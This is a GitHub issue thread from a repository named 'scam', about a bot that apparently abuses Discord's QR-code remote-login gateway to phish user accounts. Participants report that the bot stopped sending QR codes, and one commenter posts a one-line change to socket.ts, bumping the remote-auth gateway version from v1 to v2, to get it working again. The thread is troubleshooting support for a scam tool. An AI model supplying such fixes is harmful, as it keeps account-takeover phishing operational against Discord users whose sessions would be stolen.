### ISSUE TITLE
QR CODE SENDING PROBLEM

### ISSUE THREAD

**Issue by GodxPP** [ulnk/scam#33]
it won't send me the QR code or to anyone, i'm getting no errors in console.
![Screenshot from 2022-09-13 16-21-25](https://user-images.githubusercontent.com/67607834/189912290-0679bb75-a4a6-4b56-a0da-39e1593049f4.png)

**Comment by GodxPP** [comment]
instantly

**Comment by ulnk** [comment]
idk
it is outdated

**Comment by maxencefiu** [comment]
Hello, sale problem in my part and in my friend part. So I think discord patched the bot

**Comment by knockstick** [comment]
I found the fix!

Go to \src\discord\util, open socket.ts file, and change this line:

```const socketClient = new WebSocket(`wss://remote-auth-gateway.discord.gg/?v=1`, { origin: 'https://discord.com', handshakeTimeout: 10000 });```

to this line:

```const socketClient = new WebSocket(`wss://remote-auth-gateway.discord.gg/?v=2`, { origin: 'https://discord.com', handshakeTimeout: 10000 });```

Then run the bot and try to use it
